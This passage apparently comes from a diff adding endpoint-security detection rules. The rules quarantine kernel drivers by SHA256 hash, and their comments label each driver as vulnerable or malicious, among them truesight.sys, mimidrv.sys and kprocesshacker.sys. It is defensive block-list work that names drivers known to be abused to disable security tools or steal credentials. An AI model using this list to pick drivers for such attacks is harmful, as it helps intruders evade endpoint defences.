+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16774b23-ec54-5703-ac9c-dcd7d5f51ded",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824794Z",
+ "creation_date": "2026-03-23T11:45:30.824797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba3f881f656a0053081640d9381bc60cceec0d28f1b51ec9723fa8c1e4ab983c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "167be708-8035-5496-a8c5-252b56380848",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459129Z",
+ "creation_date": "2026-03-23T11:45:30.459132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f488500be4eaafba74b644be95d4c0523297770fb9bb78c449f643ab8d4a05d9",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "168b1cc9-0bd9-5ed7-ba20-e45fc7c816d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141646Z",
+ "creation_date": "2026-03-23T11:45:31.141648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90a225fd5dde6ed4f02b93c7fb8d61a7b1e971c7be89bf03489d1bca3bb6b9fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "168b7e66-f6bf-5741-a440-14bc17015155",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156449Z",
+ "creation_date": "2026-03-23T11:45:31.156451Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2062cb33e7c5aa01bf0f5c4c78d3c5a3bd757492545ab4494cfc6ccf2efa2da8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16914bf1-0cfc-5340-ba93-ef24964b80bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155402Z",
+ "creation_date": "2026-03-23T11:45:31.155405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02d5694e2727bcd840e3563570d5d565a153632c55c0bbd074f32693e728b17c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1699d89a-9bc6-5018-b20f-f485f9c2b6a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808320Z",
+ "creation_date": "2026-03-23T11:45:31.808323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13a17b8a155e0cf0a8fef9db9067cebfb69849c2311d52a5790239ab41e4572a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "169b66db-e58c-5638-afdc-98f96ee1d54e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479260Z",
+ "creation_date": "2026-03-23T11:45:30.479262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "994f322def98c99aec7ea0036ef5f4b802120458782ae3867d116d55215c56e4",
+ "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16a0ae15-4c80-509d-af4e-79c1bfb72b34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827309Z",
+ "creation_date": "2026-03-23T11:45:30.827311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08728784826b5240145fbfa4e6f98234690624cf0c2398eca40accda1c4f7e3e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16ac11db-caa4-5526-add3-c7f991b5f3ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831371Z",
+ "creation_date": "2026-03-23T11:45:30.831374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c5b695c3336628a33aaa69c98551273a23021d0af663fec196aff2b80dc7636",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16af6e9e-f2ee-59df-af86-56a6f5448285",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834756Z",
+ "creation_date": "2026-03-23T11:45:30.834759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c38fd37dd3694cdb2bab7ad1d403c25acf3caeefcf50f5b042a2ddc40a7b2f23",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16be3c2d-df44-52b8-946b-e298e5629093",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467619Z",
+ "creation_date": "2026-03-23T11:45:30.467622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467631Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d11419d2f1d6217481d12d3f3fcd13f693f7454f9fadcdeee72bdc0ce06c8e2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16ce02a0-7718-5dc9-9268-9a48004c2d74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482090Z",
+ "creation_date": "2026-03-23T11:45:31.482094Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21949150dd0b15bcd883815e27a9b2bed0a4fc73efba1f821670ece3a4279002",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16d4604f-f39c-5620-81a2-db3d7600332c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819532Z",
+ "creation_date": "2026-03-23T11:45:30.819534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afda5af5f210336061bff0fab0ed93ee495312bed639ec5db56fbac0ea8247d3",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16deda0c-c87a-58c7-82f1-64e64a77d4f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604717Z",
+ "creation_date": "2026-03-23T11:45:29.604719Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16f47624-8a60-5c5a-b727-295198dec4aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466378Z",
+ "creation_date": "2026-03-23T11:45:30.466381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1703161e-a974-5c0c-b228-38797026deb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481073Z",
+ "creation_date": "2026-03-23T11:45:31.481076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c9a5dd30173da95e9785b5ee1743c50762a113a6af841969d9131fb99e1e96e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "173410eb-0587-5203-8910-a6e99aacb7b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818600Z",
+ "creation_date": "2026-03-23T11:45:31.818603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19f89225aa3867d60ac8a21553b642ae7e2d4559c21d685f46e2af81b3456f19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "173b038a-72e5-5fd6-bb32-f6b37c9ed2f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620332Z",
+ "creation_date": "2026-03-23T11:45:29.620334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "174052fe-758a-5e3b-9a33-264f819c1bd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159013Z",
+ "creation_date": "2026-03-23T11:45:31.159015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c36c97d499a6e3154883aa0e19167aaae0cab01b83bb7a934a7ccbd077df6bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "174b10e5-f4cc-5157-b01f-732267b2e8a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827071Z",
+ "creation_date": "2026-03-23T11:45:30.827073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8895c23c7d39b59516ea2e411491862391d8aa41575cb58f9446ecd8b5551e9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "17541b59-f6e9-58f7-be8c-4218994d736e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146452Z",
+ "creation_date": "2026-03-23T11:45:32.146455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44a89f82bf3303553f9a9fdf136b4453af6d4c777c95da57c5b8baca8506c272",
+ "comment": "Malicious Kernel Driver (aka driver_1a74c2bd.sys) [https://www.loldrivers.io/drivers/af153e7c-13fa-4a40-a095-00726ad6d783/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "176bf81a-6c4e-5ae3-b7e5-4098aa4ed547",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827613Z",
+ "creation_date": "2026-03-23T11:45:30.827615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6cf6159f63328c4e05587c2acfb5548c3fe9318456c9d12f496f01a783310b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "176d3ad5-b0d1-58fa-ab9f-98ba92b8ca05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
